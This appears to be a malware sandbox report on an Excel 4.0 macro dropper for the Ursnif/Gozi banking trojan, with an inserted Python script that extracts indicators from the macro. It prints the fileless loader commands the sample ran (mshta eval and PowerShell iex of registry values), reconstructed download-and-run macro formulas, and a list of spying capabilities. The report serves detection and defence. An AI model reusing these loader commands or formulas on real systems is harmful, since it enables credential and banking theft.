Source: rundll32.exe, 00000003.00000002.2420638109.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416494035.0000000001F47000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341411688.0000000003917000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000013.00000002.2341613809.0000000003D40000.00000002.00000001.sdmp, powershell.exe, 00000014.00000002.2416505711.0000000002450000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2420148459.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416331199.0000000001D60000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2420638109.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416494035.0000000001F47000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341411688.0000000003917000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2420148459.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416331199.0000000001D60000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown HTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.22:49194 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.2321839049.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321796165.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321745663.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2455042419.0000000002936000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321730520.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321759010.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2378828561.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2416998966.0000000002890000.00000040.00000001.sdmp, type: MEMORY
Contains functionality to record screenshots
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A25C8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 4_2_003A25C8
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003C9950 GetKeyboardState, 4_2_003C9950
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 4_2_02356C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 4_2_02356C29
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.2321839049.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321796165.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321745663.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2455042419.0000000002936000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321730520.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321759010.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2378828561.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2416998966.0000000002890000.00000040.00000001.sdmp, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
Source: Screenshot number: 4 Screenshot OCR: Enable Content I F122 -',- jR xIs [Compatibility Mode] - Microsoft Excel - xIs [Compatibility Mod
Found Excel 4.0 Macro with suspicious formulas
Source: xls.xls Initial sample: EXEC
Source: xls.xls Initial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheet
Source: xls.xls Initial sample: Sheet size: 5210
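The report identifies the initial stage as an Excel 4.0 (XLM) macro using EXEC and CALL on an abnormally large hidden macro sheet, and the Software Vulnerabilities section ties the download to URLDownloadToFileA loaded from EXCEL.EXE. The Python below is an added example, not part of the Joe Sandbox report: it takes XLM formula text (as a BIFF dumper such as olevba would print it), resolves CHAR() and & concatenation so obfuscated strings become readable, then pulls the called DLL export, URLs and file paths out of EXEC/CALL arguments. The two formulas are constructed for illustration: they reuse the URL and drop path recorded in this report, but the exact formula text, the "JJCCJJ" type string and the rundll32 ",#1" argument are assumptions, since the report does not show the macro itself.

```python
"""IOC extraction from Excel 4.0 (XLM) macro formulas.

Added example, not part of the sandbox report. FORMULAS are constructed
to reuse the URL and drop path the report records; the formula text itself
and the rundll32 arguments are assumptions.
"""
import re

SUSPICIOUS = {"EXEC", "CALL", "REGISTER", "FORMULA", "FORMULA.FILL", "RUN"}
URL_RE = re.compile(r"https?://[^\s\"',)]+", re.I)
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s\",]+")


def fold(expr):
    """Resolve CHAR(n) and collapse "a"&"b" concatenations into one literal."""
    expr = re.sub(r"CHAR\((\d+)\)",
                  lambda m: '"' + chr(int(m.group(1))).replace('"', '""') + '"',
                  expr, flags=re.I)
    prev = None
    while prev != expr:  # repeat until no adjacent "x"&"y" pairs remain
        prev = expr
        expr = re.sub(r'"((?:[^"]|"")*)"\s*&\s*"((?:[^"]|"")*)"',
                      lambda m: '"' + m.group(1) + m.group(2) + '"', expr)
    return expr


def split_args(s):
    """Split a call's argument list on top-level commas, honouring quotes and parentheses."""
    args, buf, depth, in_str = [], [], 0, False
    i = 0
    while i < len(s):
        c = s[i]
        if in_str:
            if c == '"' and s[i + 1:i + 2] == '"':  # doubled quote inside a literal
                buf.append('"')
                i += 2
                continue
            if c == '"':
                in_str = False
            else:
                buf.append(c)
        elif c == '"':
            in_str = True
        elif c == "," and depth == 0:
            args.append("".join(buf).strip())
            buf = []
        else:
            depth += (c == "(") - (c == ")")
            buf.append(c)
        i += 1
    args.append("".join(buf).strip())
    return args


def triage(formula):
    """Return None for a benign formula, else the function, called API and IOCs."""
    m = re.match(r"^=\s*([A-Z][A-Z.]*)\((.*)\)\s*$", fold(formula).strip(), re.I | re.S)
    if not m or m.group(1).upper() not in SUSPICIOUS:
        return None
    func, args = m.group(1).upper(), split_args(m.group(2))
    joined = " ".join(args)
    info = {"function": func, "api": None,
            "urls": URL_RE.findall(joined), "paths": PATH_RE.findall(joined)}
    if func == "CALL" and len(args) >= 2:
        info["api"] = f"{args[0]}!{args[1]}"   # e.g. urlmon!URLDownloadToFileA
    elif func == "EXEC" and args:
        info["command"] = args[0]
    return info


FORMULAS = [  # constructed examples, not the sample's actual cells
    r'=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://online-docu-sign-st.com/yytr.png","C:\fyjh\zglgy\lckhvmn.drhdh",0,0)',
    r'=EXEC(CHAR(114)&CHAR(117)&CHAR(110)&CHAR(100)&CHAR(108)&CHAR(108)&"32 "&"C:\fyjh\zglgy\lckhvmn.drhdh,#1")',
    "=SUM(A1:A5)",
]

if __name__ == "__main__":
    for f in FORMULAS:
        print(f, "->", triage(f))
```

Folding CHAR() before matching matters: the hidden sheet in a sample like this is large mainly because the command strings are assembled a character at a time, so a scanner that only greps for literal "EXEC(" or "http" sees nothing until the concatenations are resolved.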
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\fyjh\zglgy\lckhvmn.drhdh
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\yytr[1].png
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003CC8CC NtdllDefWindowProc_A,GetCapture, 4_2_003CC8CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A863C NtdllDefWindowProc_A, 4_2_003A863C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003C281C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 4_2_003C281C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B9348 NtdllDefWindowProc_A, 4_2_003B9348
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B9AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 4_2_003B9AF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B9BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 4_2_003B9BA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_004314E8 NtCreateSection,memset, 4_2_004314E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0043183B NtMapViewOfSection, 4_2_0043183B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_004322C5 NtQueryVirtualMemory, 4_2_004322C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_004772D8 NtMapViewOfSection, 4_2_004772D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00471371 GetProcAddress,NtCreateSection,memset, 4_2_00471371
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00477507 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_00477507
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0047B2F1 NtQueryVirtualMemory, 4_2_0047B2F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02355AD9 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 4_2_02355AD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02361B30 NtWriteVirtualMemory, 4_2_02361B30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235F0A0 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 4_2_0235F0A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234C088 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 4_2_0234C088
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234BE78 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_0234BE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02349E4D NtGetContextThread, 4_2_02349E4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234E64A OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 4_2_0234E64A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02360755 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 4_2_02360755
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235B534 NtQueryInformationProcess, 4_2_0235B534
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235CD06 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 4_2_0235CD06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235FA3B NtQuerySystemInformation,RtlNtStatusToDosError, 4_2_0235FA3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02355348 memset,NtQueryInformationProcess, 4_2_02355348
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234F920 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 4_2_0234F920
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02355903 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_02355903
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_023466A5 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_023466A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02356EDE NtGetContextThread,RtlNtStatusToDosError, 4_2_02356EDE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234CC2C NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 4_2_0234CC2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_023494BB memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 4_2_023494BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_023534F7 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_023534F7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B7278 NtWriteVirtualMemory, 20_2_028B7278
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B20B4 NtQueryInformationProcess, 20_2_028B20B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_02897008 NtQueryInformationToken,NtQueryInformationToken, 20_2_02897008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B4064 NtMapViewOfSection, 20_2_028B4064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_0289EF1C NtSetContextThread,NtUnmapViewOfSection, 20_2_0289EF1C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_02895DF4 NtCreateSection, 20_2_02895DF4
Source: C:\Windows\explorer.exe Code function: 28_2_02916A74 NtQuerySystemInformation, 28_2_02916A74
Source: C:\Windows\explorer.exe Code function: 28_2_02927278 NtWriteVirtualMemory, 28_2_02927278
Source: C:\Windows\explorer.exe Code function: 28_2_0290527C NtAllocateVirtualMemory, 28_2_0290527C
Source: C:\Windows\explorer.exe Code function: 28_2_02912FD0 NtQueryInformationProcess, 28_2_02912FD0
Source: C:\Windows\explorer.exe Code function: 28_2_0290EF1C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection, 28_2_0290EF1C
Source: C:\Windows\explorer.exe Code function: 28_2_0291FF54 NtReadVirtualMemory, 28_2_0291FF54
Source: C:\Windows\explorer.exe Code function: 28_2_029014D0 NtQueryInformationProcess, 28_2_029014D0
Source: C:\Windows\explorer.exe Code function: 28_2_02924064 NtMapViewOfSection, 28_2_02924064
Source: C:\Windows\explorer.exe Code function: 28_2_02905DF4 NtCreateSection, 28_2_02905DF4
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235EE34 CreateProcessAsUserW, 4_2_0235EE34
Detected potential crypto function
Document contains embedded VBA macros
Source: xls.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00386224 appears 61 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00383470 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00383EBC appears 78 times
PE file does not import any functions
Source: vl8o3v8u.dll.24.dr Static PE information: No import functions for PE file found
Source: 8pjpp9kb.dll.22.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Yara signature match
Source: xls.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2420148459.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416331199.0000000001D60000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.phis.bank.troj.spyw.expl.evad.winXLS@63/76@14/4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A0AE8 GetLastError,FormatMessageA, 4_2_003A0AE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003885C8 GetDiskFreeSpaceA, 4_2_003885C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_004782EB CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 4_2_004782EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0047A12D CoCreateInstance, 4_2_0047A12D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00396AE4 FindResourceA, 4_2_00396AE4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\0FDE0000
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{C7880720-7A2F-91F8-BCEB-4E55B04F6259}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{1BDCE616-BEE2-052B-A07F-D209D423264D}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD6AF.tmp
Source: xls.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorlib.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32 C:\fyjh\zglgy\lckhvmn.drhdh,DllRegisterServer
Source: xls.xls Virustotal: Detection: 16%
Source: xls.xls ReversingLabs: Detection: 10%
Source: rundll32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: powershell.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\fyjh\zglgy\lckhvmn.drhdh,DllRegisterServer
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2828 CREDAT:275457 /prefetch:2
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2392 CREDAT:275457 /prefetch:2
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1340 CREDAT:275457 /prefetch:2
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2168 CREDAT:275457 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47278A61-FA3B-119B-3C6B-CED530CFE2D9\\\CRPPcapi'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\47278A61-FA3B-119B-3C6B-CED530CFE2D9').apiMgcfg))
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\8pjpp9kb.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES6C1D.tmp' 'c:\Users\user\AppData\Local\Temp\CSC6C1C.tmp'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vl8o3v8u.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8BAE.tmp' 'c:\Users\user\AppData\Local\Temp\CSC8BAD.tmp'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\29B8.bi1'
Source: unknown Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\29B8.bi1'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'ipconfig /all >> C:\Users\user\AppData\Local\Temp\B55E.bin1'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'systeminfo.exe > C:\Users\user\AppData\Local\Temp\A8F1.bin1'
Source: unknown Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 C:\fyjh\zglgy\lckhvmn.drhdh,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\fyjh\zglgy\lckhvmn.drhdh,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2828 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2392 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1340 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2168 CREDAT:275457 /prefetch:2
